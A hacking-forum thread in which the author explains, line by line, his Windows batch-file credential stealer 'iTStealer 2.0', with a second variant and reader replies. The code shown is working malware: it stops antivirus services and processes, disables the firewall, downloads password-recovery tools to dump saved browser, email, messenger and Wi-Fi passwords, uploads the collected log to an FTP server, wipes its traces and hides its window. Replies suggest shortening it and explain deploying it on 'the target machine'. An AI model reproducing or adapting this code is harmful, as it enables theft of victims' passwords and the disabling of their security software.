Breakdown of iTStealer 2.0 Batch File

[iTpHo3NiX]

Full application:
http://evilzone.org/board/index.php/topic,59.0.html

Ok well I love to help people with their batch files and one of my most advanced batch files happens to be my iTStealer. Honestly I don't even use it anymore, but it was still fun to program (And I only ever shared it on EvilZone) Now I also have no problem making all of my sources open and welcome anyone to modify them as long as original credit is given to the original authors. Now with a batch file, there are many different ways to accomplish the same end. Also at the end of this, I am going to post a modified version as well that does not use an FTP server (its more for a USB Switchblade stealer that my dad coded based off of my source) which I beleive is a good way to see how my source can be modified to add more functionality (although I believe he used my v1 source that doesn't have my changes such as the nirsoft downloader and anything in the changelog) The original source can be found here in the archive. Anyways on to business.

My new iTStealer2.0 Batch script has comments in it, however I will go into detail about what each line of my code is doing and how it works, so if you choose to modify my source, you have a better grasp of what I was trying to accomplish in my script.

Code: [Select]

@echo off
Title=iTStealer 2.0 by iTpHo3NiX
Now if you know what this means, you should be able to continue and follow pretty well, however if you have no clue what this means then you should look more into batch programming and come back later.

These two lines simply turn "echo off" which in the command line (even though it's hidden) wont show you the commands that have been used. If you are editing the source, then you may want to turn "echo on" and add pauses so you can find any bugs especially if it's not working. The next line simply sets the title. However this is not really needed as your going to want to hide the window (I accomplished this with vBScript)

With this next portion, it may be pointless to most, however it will help protect the running of this application. It is a "Virus" stopper. I do not know of the original author of this particular set, but it will stop some virus scanners in their tracks. For this, its also a 3 part process, lets start with part one.

Code: [Select]

:virusstopper
net stop ACKWIN32
net stop ADVXDWIN
net stop ALERTSVC
net stop ALOGSERV
net stop AMON9X
net stop ANTI-TROJAN
net stop ANTS
net stop apvxdwin
net stop ATCON
net stop ATUPDATER
net stop ATWATCH
net stop AUTODOWN
net stop AutoTrace
net stop AVCONSOL
net stop AVGCC32
net stop AVGCTRL
net stop Avgctrl
net stop AVGSERV
net stop AvgServ
net stop AVGSERV9
net stop AVGW
net stop avkpop
net stop AVKSERV
net stop avkservice
net stop avkwctl9
net stop AVP32
net stop AVP32
net stop AVPCC
net stop AVPCC
net stop AVPM
net stop AVPM
net stop Avsched32
net stop AVSYNMGR
net stop AvSynMgr
net stop AVWINNT
net stop AVXMONITOR9X
net stop AVXMONITORNT
net stop AVXQUAR
net stop AVXW
net stop BLACKD
net stop BLACKICE
net stop BlackICE
net stop CLAW95
net stop CLAW95CF
net stop CLEANER
net stop CLEANER3
net stop CMGRDIAN
net stop CONNECTIONMONITOR
net stop defscangui
net stop DEFWATCH
net stop DOORS
net stop DVP95
net stop EFPEADM
net stop ETRUSTCIPE
net stop EVPN
net stop EXPERT
net stop fameh32
net stop fch32
net stop fih32
net stop fnrb32
net stop fsaa
net stop fsav32
net stop fsgk32
net stop fsm32
net stop fsma32
net stop fsmb32
net stop gbmenu
net stop GENERICS
net stop GUARD
net stop GUARDDOG
net stop HELP
net stop IAMAPP
net stop IAMSERV
net stop ICLOAD95
net stop ICLOADNT
net stop ICMON
net stop ICSUPP95
net stop ICSUPPNT
net stop IFACE
net stop IOMON98
net stop ISRV95
net stop JEDI
net stop LDNETMON
net stop LDPROMENU
net stop LDSCAN
net stop LOCKDOWN
net stop LOCKDOWN2000
net stop LUALL
net stop LUCOMSERVER
net stop MCAGENT
net stop MCMNHDLR
net stop MCSHIELD
net stop McShield
net stop MCTOOL
net stop MCUPDATE
net stop MCVSRTE
net stop MCVSSHLD
net stop MGAVRTCL
net stop MGAVRTE
net stop MGHTML
net stop minilog
net stop MONITOR
net stop MOOLIVE
net stop MWATCH
net stop NAVAP
net stop navapsvc
net stop NAVAPW32
net stop NAVENG
net stop NAVEX15
net stop NAVLU32
net stop NAVW32
net stop NAVWNT
net stop NDD32
net stop NeoWatchLog
net stop NETUTILS
net stop ngdbserv
net stop NGServer
net stop NISSERV
net stop NISSERV
net stop NISUM
net stop NISUM
net stop NMAIN
net stop NORMIST
net stop NPROTECT
net stop NPSSVC
net stop NSCHED32
net stop ntrtscan
net stop NTVDM
net stop NTXconfig
net stop NVC95
net stop NVSVC32
net stop NWService
net stop NWTOOL16
net stop PADMIN
net stop pavproxy
net stop PCCIOMON
net stop pccntmon
net stop pccwin97
net stop PCCWIN98
net stop pcscan
net stop PERSFW
net stop POP3TRAP
net stop POPROXY
net stop PORTMONITOR
net stop PROCESSMONITOR
net stop PROGRAMAUDITOR
net stop PROT95
net stop PVIEW95
net stop RAV7
net stop RAV7WIN
net stop REALMON
net stop RESCUE
net stop RTVSCN95
net stop sbserv
net stop SCAN32
net stop SCRSCAN
net stop sharedaccess
net stop SPHINX
net stop SPYXX
net stop SS3EDIT
net stop STOPW
net stop SVW3
net stop SWEEP95
net stop SweepNet
net stop SWEEPSRV
net stop SWEEPSRV.SYS
net stop SweepUpdate
net stop SWNETSUP
net stop SymProxySvc
net stop SYMTRAY
net stop TFAK
net stop vbcmserv
net stop VbCons
net stop VET32
net stop VET95
net stop VETTRAY
net stop VPC32
net stop VPTRAY
net stop VSCHED
net stop VSECOMR
net stop VSHWIN32
net stop VSMAIN
net stop vsmon
net stop VSMON
net stop VSSTAT
net stop WATCHDOG
net stop WEBSCANX
net stop WGFE95
net stop WIMMUN32
net stop WRADMIN
net stop WRCTRL
net stop ZAPROMINILOG
net stop ZONEALARM
All of these commands utilize the "net" command. What it's doing is trying to stop services from running (in this case various anti-virus software) as most of them run as a service.

Code: [Select]

tskill /A av*
tskill /A fire*
tskill /A anti*
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
tskill /A offg*
This part of the av killer will try and kill the processes of various antivirus software, sometimes it works, sometimes it doesn't kind of a hit and miss.

Code: [Select]

echo %ProgramFiles%\alwils~1\avast4\*.* > nul
echo %ProgramFiles%\Lavasoft\Ad-awa~1\*.exe > nul
echo %ProgramFiles%\kasper~1\*.exe > nul
echo %ProgramFiles%\trojan~1\*.exe > nul
echo %ProgramFiles%\f-prot95\*.dll > nul
echo %ProgramFiles%\tbav\*.dat > nul
echo %ProgramFiles%\avpersonal\*.vdf > nul
echo %ProgramFiles%\Norton~1\*.cnt > nul
echo %ProgramFiles%\Mcafee\*.* > nul
echo %ProgramFiles%\Norton~1\Norton~1\Norton~3\*.* > nul
echo %ProgramFiles%\Norton~1\Norton~1\speedd~1\*.* > nul
echo %ProgramFiles%\Norton~1\Norton~1\*.* > nul
echo %ProgramFiles%\Norton~1\*.* > nul
echo %ProgramFiles%\avgamsr\*.exe > nul
echo %ProgramFiles%\avgamsvr\*.exe > nul
echo %ProgramFiles%\avgemc\*.exe > nul
echo %ProgramFiles%\avgcc\*.exe > nul
echo %ProgramFiles%\avgupsvc\*.exe > nul
echo %ProgramFiles%\grisoft\*.* > nul
echo %ProgramFiles%\nood32krn\*.exe > nul
echo %ProgramFiles%\nood32\*.exe > nul
echo %ProgramFiles%\nod32\*.* > nul
echo %ProgramFiles%\nood32 > nul
echo %ProgramFiles%\kav\*.exe > nul
echo %ProgramFiles%\kavmm\*.exe > nul
echo %ProgramFiles%\kaspersky\*.* > nul
echo %ProgramFiles%\ewidoctrl\*.exe > nul
echo %ProgramFiles%\guard\*.exe > nul
echo %ProgramFiles%\ewido\*.exe > nul
echo %ProgramFiles%\pavprsrv\*.exe > nul
echo %ProgramFiles%\pavprot\*.exe > nul
echo %ProgramFiles%\avengine\*.exe > nul
echo %ProgramFiles%\apvxdwin\*.exe > nul
echo %ProgramFiles%\webproxy\*.exe > nul
echo %ProgramFiles%\panda software\*.* > nul
This last part will attempt to corrupt various functions of antivirus applications and has the highest possibility of working if the service is stopped and the application is terminated. However if it did not kill the antivirus this part could stop it from working properly.

Code: [Select]

:nirsoft
wget --tries=3 http://www.nirsoft.net/utils/mspass.zip
wget --tries=3 http://www.nirsoft.net/utils/mailpv.zip
wget --tries=3 http://www.nirsoft.net/utils/iepv.zip
wget --tries=3 http://www.nirsoft.net/utils/passwordfox.zip
wget --tries=3 http://www.nirsoft.net/utils/chromepass.zip
wget --tries=3 http://www.nirsoft.net/utils/wirelesskeyview.zip
Now this part uses a 3rd party application, wget. Which is a compiled binary that you will commonly see in linux to download things via CLI, same here, in fact its the same program, just ported to windows. What this does is download some more 3rd party applications to the victims machine, and if the AV Killer worked, or if nirsoft does their job correctly, will come up FUD (Fully Undetectable)

Code: [Select]

set extract=C:\steal
This simple line is setting the variable "%extract%" to a specific location. Now I use a specific location to ease cleanup. Also some people are sckeptics and feel that because I use "C:\" not all oses are ran on C, however the computer will NEED a C drive, so whether the OS is loaded on C or not, its still there and this will be able to utilize that

Code: [Select]

cls
dir /b /s *.zip>zip.lst
for /f "delims==" %%i in (zip.lst) do (
echo %%~dpi
pushd "%%~dpi"
if not exist ".\%%~ni" md ".\%%~ni"
7z  x "%%~nxi" -o".\%%~ni"
popd
)
del /f /q zip.lst
This is part of my EA-RCE. I really don't feel like explaining it, as its hard for me to correlate what all this means in English. Just know that its taking the files found in a directory [recursively] (in this case C:\Steal) creating a list file (zip.lst) and then using the list file for 7zip to unarchive them. It also checks to see if the file has already been extracted.

Code: [Select]

cd chromepass
xcopy /y ChromePass.exe %extract%
cd..
cd iepv
xcopy /y iepv.exe %extract%
cd..
cd mailpv
xcopy /y mailpv.exe %extract%
cd..
cd mspass
xcopy /y mspass.exe %extract%
cd..
cd passwordfox
xcopy /y PasswordFox.exe %extract%
cd..
cd wirelesskeyview
xcopy /y WirelessKeyView.exe %extract%
cd..
cls
What this is doing is copying all of the EXE's that I'm going to be using it %extract% (aka C:\Steal)

Code: [Select]

rd /s /q chromepass
rd /s /q iepv
rd /s /q mailpv
rd /s /q mspass
rd /s /q passwordfox
rd /s /q wirelesskeyview
del /f /q chromepass.zip
del /f /q iepv.zip
del /f /q mailpv.zip
del /f /q mspass.zip
del /f /q passwordfox.zip
del /f /q wirelesskeyview.zip
cls
This is a little cleanup which removes the directories (rd) and then deletes the zip files (del)

Code: [Select]

systeminfo>c:\steal\system.txt
ipconfig /all>c:\steal\ip.txt
mem>c:\steal\memory.txt
net start>c:\steal\services.txt
ver>c:\steal\build.txt
tlntadmn>c:\steal\localhost.txt
net user>c:\steal\networkusers.txt
tasklist>c:\steal\tasklist.txt
schtasks>c:\steal\taskname.txt
mountvol>c:\steal\disks.txt
echo %time%>c:\steal\time.txt
echo %username>c:\steal\user.txt
echo %date%>c:\steal\date.txt
mspass.exe /stext c:\steal\mess.txt
mailpv.exe /stext c:\steal\mail.txt
iepv.exe /stext c:\steal\iepass.txt
PasswordFox.exe /stext c:\steal\firefox.txt
ChromePass.exe /stext c:\steal\chrome.txt
WirelessKeyView.exe /stext c:\steal\wireless.txt
This is the main function of the application after it runs all of the other stuff this is the big ticket number. This is taking various commands and making several text documents with the information we are gathering.

Code: [Select]

set /a num=%random%
Here I am setting a new variable with a variable, if that makes sense lol. Well With my beta and first release I had a dilemma where my file was at a point where it couldn't be spread. Why? Because if two computers shared the same name/username (ie Administrator) it would overwrite that file and I would no longer have a log for that particular computer. This is how I bypassed that problem. %random% will generate a random number and I set "%num%" to a variable because if I were to run %random% again (which will be needed for the FTP to send the file) I was unable to keep that same random number. So this fixes that problem and its very slim for random to generate the same number to the same username.

Code: [Select]

copy c:\steal\system.txt + c:\steal\ip.txt + c:\steal\memory.txt + c:\steal\services.txt + c:\steal\build.txt + c:\steal\localhost.txt + c:\steal\networkusers.txt + c:\steal\tasklist.txt + c:\steal\taskname.txt + c:\steal\disks.txt + c:\steal\time.txt + c:\steal\date.txt + c:\steal\mess.txt + c:\steal\mail.txt + c:\steal\iepass.txt + c:\steal\wireless.txt + c:\steal\firefox.txt + c:\steal\chrome.txt + c:\steal\user.txt c:\steal\%USERNAME%-%num%.txt
pushd C:\steal\
Now this is simply merging all of those text files into one file named USERNAME-NUMBER and then changes directory to C:\steal

Code: [Select]

netsh firewall set opmode disable
Now I had to throw this in there because during my tests, it would ask my permission before I could upload the file to the FTP server. This will disable that notification.

Code: [Select]

echo open ftpserver>ftp.iTp
echo user ftpusername>>ftp.iTp
echo ftppassword>>ftp.iTp
echo send %USERNAME%-%num%.txt>>ftp.iTp
echo bye>>ftp.iTp
This is the FTP information that will be used to send the file to the FTP server that is set. simple uses echo to write what the FTP will be doing, first connect, then enter a username and password then send the log and exit the ftp.

Code: [Select]

ftp.exe -n -i -s:c:\steal\ftp.iTp
This will use the ftp.iTp (simple a text file) which instructs the FTP on what to do. In this case what FTP server to connect to and then upload the file to it.

Code: [Select]

del /f /q *.*
popd
pushd C:\
if exist steal rd /s /q steal
popd
pushd %temp%
del /f /q *.exe
del /f /q *.bat
del /f /q *.vbs
del /f /q *.iTp
popd
This is another cleanup to remove the files used.

Code: [Select]

pushd "%temp%"
if exist stealer rd /s /q stealer
popd
Just a little bonus cleanup.

So that is my iTStealer and everything it does. Now as I said above that I used a VBScript to hide the console window. My VBScript to accomplish that is this:

Code: [Select]

set objShell = CreateObject("WScript.Shell")
objShell.Run "iTStealer2.0.bat", vbHide, TRUE
Then I run the start.vbs to initiate the whole thing. and will completely hide the console window whilst it does its thing.

Now as said here is an alternate script (which will require the nirsoft tools) I haven't exactly looked through his script, but it will get pretty much the same information and then put it in a text file in the directory of which it is ran. It's also still a work in progress but I haven't really been talking to him. This is just an example of how you can modify my source.

Code: [Select]

title myst
cmdow myst /hid
@echo off
cd..
set mytmp=%cd%
cd myst
set mydrv=%cd%

rem Date and time
echo Date: %date%   Time: %time%>%systemdrive%\system.lst
type blank.txt>>%systemdrive%\system.lst

rem Current username
echo %username% | find /v /i " command completed ">>%systemdrive%\system.lst
type blank.txt>>%systemdrive%\system.lst

rem Windows version information
ver>>%systemdrive%\system.lst
type blank.txt>>%systemdrive%\system.lst

rem Main system info
systeminfo | find /v /i "file 1">>%systemdrive%\system.lst
type blank.txt>>%systemdrive%\system.lst

rem Programs in memory
mem>>%systemdrive%\system.lst
type blank.txt>>%systemdrive%\system.lst

rem Mount points
mountvol | find /v /i "/" | find /v /i "path" | find /v /i "point." | find /v /i "target" | find /v /i "reside">>%systemdrive%\system.lst
type blank.txt>>%systemdrive%\system.lst

rem Services that are running
net start | find /v /i " command completed ">>%systemdrive%\system.lst
type blank.txt>>%systemdrive%\system.lst

rem Programs in the tasklist
tasklist>>%systemdrive%\system.lst
type blank.txt>>%systemdrive%\system.lst

rem Local accounts on computer
net user | find /v /i " command completed ">>%systemdrive%\system.lst
type blank.txt>>%systemdrive%\system.lst

rem As long as site doesnt change we can get the external ip
cscript getip.js | find /i "hostname">%systemdrive%\extip.lst
for /f "tokens=1,2*" %%i in (%systemdrive%\extip.lst ) do (
if "%%i"=="<p><b>Hostname</b>:" echo %%j>%systemdrive%\realip.lst
)
for /f "tokens=1,2,3,4* delims=.-" %%i in (%systemdrive%\realip.lst ) do (
echo Real XTWAN IP: %%i.%%j.%%k.%%l>>%systemdrive%\system.lst
echo iNet Provider: %%m>>%systemdrive%\system.lst
)
if exist %systemdrive%\extip.lst  del %systemdrive%\extip.lst
if exist %systemdrive%\realip.lst  del %systemdrive%\realip.lst
type blank.txt>>%systemdrive%\system.lst

rem Local network information
ipconfig /all>>%systemdrive%\system.lst
type blank.txt>>%systemdrive%\system.lst

rem Telnet admin information
tlntadmn>%systemdrive%\local.lst
for /f "tokens=1,2* delims==:" %%i in (%systemdrive%\local.lst ) do (
echo %%i %%j %%k>>%systemdrive%\system.lst
)

rem Scheduled tasks
schtasks>>%systemdrive%\system.lst
type blank.txt>>%systemdrive%\system.lst

rem What programs are installed
if exist %systemdrive%\"program files" dir /b /ad %systemdrive%\"program files">>%systemdrive%\system.lst
type blank.txt>>%systemdrive%\system.lst

rem Extra addon for 64bit machines
if exist %systemdrive%\"program files (x86)" dir /b /ad %systemdrive%\"program files (x86)">>%systemdrive%\system.lst
type blank.txt>>%systemdrive%\system.lst

rem Saved microsoft passwords
mspass.exe /stext %systemdrive%\mess.lst
type %systemdrive%\mess.lst>>%systemdrive%\system.lst
type blank.txt>>%systemdrive%\system.lst

rem Saved email passwords
mailpv.exe /stext %systemdrive%\mail.lst
type %systemdrive%\mail.lst>>%systemdrive%\system.lst
type blank.txt>>%systemdrive%\system.lst

rem Internet explorer saved passwords
iepv.exe /stext %systemdrive%\iepass.lst
type %systemdrive%\iepass.lst>>%systemdrive%\system.lst
type blank.txt>>%systemdrive%\system.lst

rem Firefox saved passwords
PasswordFox.exe /stext %systemdrive%\firefox.lst
type %systemdrive%\firefox.lst>>%systemdrive%\system.lst
type blank.txt>>%systemdrive%\system.lst

rem Mozilla chrome saved passwords
ChromePass.exe /stext %systemdrive%\chrome.lst
type %systemdrive%\chrome.lst>>%systemdrive%\system.lst
type blank.txt>>%systemdrive%\system.lst

rem Saved wireless keys
WirelessKeyView.exe /stext %systemdrive%\wireless.lst
type %systemdrive%\wireless.lst>>%systemdrive%\system.lst
type blank.txt>>%systemdrive%\system.lst

cd..
if exist "%mydrv%\%computername%" del /f /s /q "%mydrv%\%computername%"
rem if not exist "%mydrv%\%computername%" md "%mydrv%\%computername%"
pushd %systemdrive%\
move /y system.lst  "%mytmp%\%computername%.txt"
del /f /q *.lst
popd


[ande]

Ah, very nice. Will do good for people who want to understand this application more in depth

[ASLR]

Sweet! Thanks!

[xassiz]

You can spare a lot of lines using for:

Code: [Select]

net stop ACKWIN32
net stop ADVXDWIN
net stop ALERTSVC
net stop ALOGSERV
net stop AMON9X
net stop ANTI-TROJAN
...


Code: [Select]

for %%x in ("ACKWIN32","ADVXDWIN","ALERTSVC","ALOGSERV","AMON9X","ANTI-TROJAN") do (net stop %%~x)
And the same with tskill or echo lines

And nircmd is detected by most antivirus

[iTpHo3NiX]

You can spare a lot of lines using for:

Code: [Select]

net stop ACKWIN32
net stop ADVXDWIN
net stop ALERTSVC
net stop ALOGSERV
net stop AMON9X
net stop ANTI-TROJAN
...


Code: [Select]

for %%x in ("ACKWIN32","ADVXDWIN","ALERTSVC","ALOGSERV","AMON9X","ANTI-TROJAN") do (net stop %%~x)
And the same with tskill or echo lines

And nircmd is detected by most antivirus

Very true, and I never used nircmd for any of this o.O

[xassiz]

Sorry, this:

Code: [Select]

:nirsoft
wget --tries=3 http://www.nirsoft.net/utils/mspass.zip
wget --tries=3 http://www.nirsoft.net/utils/mailpv.zip
wget --tries=3 http://www.nirsoft.net/utils/iepv.zip
wget --tries=3 http://www.nirsoft.net/utils/passwordfox.zip
wget --tries=3 http://www.nirsoft.net/utils/chromepass.zip
wget --tries=3 http://www.nirsoft.net/utils/wirelesskeyview.zipconfused me xD

[iTpHo3NiX]

No problem, I used wget to download the nirsoft utilities to get the passwords for various applications (web browsers ,etc)

[xassiz]

Yes, I know

Code: [Select]

for %%x in ("chromepass","iepv","mailpv","mspass","passwordfox","wirelesskeyview") do (xcopy /y "%%~x\%%~x.exe" "%extract%")


[iTpHo3NiX]

go ahead and shrink it down lol I would love to see your twist on my iTStealer.

[yougy]

thank you for this tutorial.But i still have some questions that coming to my mind

  about the wget??? must i install it in my pc or it works like this ??
i mean the Nirsoft programs how can they be working in the target machine???

thanx again

[iTpHo3NiX]

thank you for this tutorial.But i still have some questions that coming to my mind

  about the wget??? must i install it in my pc or it works like this ??
i mean the Nirsoft programs how can they be working in the target machine???

thanx again

First of all this isn't a tutorial, its an explaination of the stealer I wrote with batch. The actual download is here: http://evilzone.org/board/index.php/topic,59.0.html

Now as far as wget, it is included in the package and when you bind the files together the wget is included with the batch file. It's a stand alone exe which does not require being installed.

Now as for the nirsoft tools, the batch file will automatically download them (with wget) to download the files and extract them.

Hope that answer's your questions.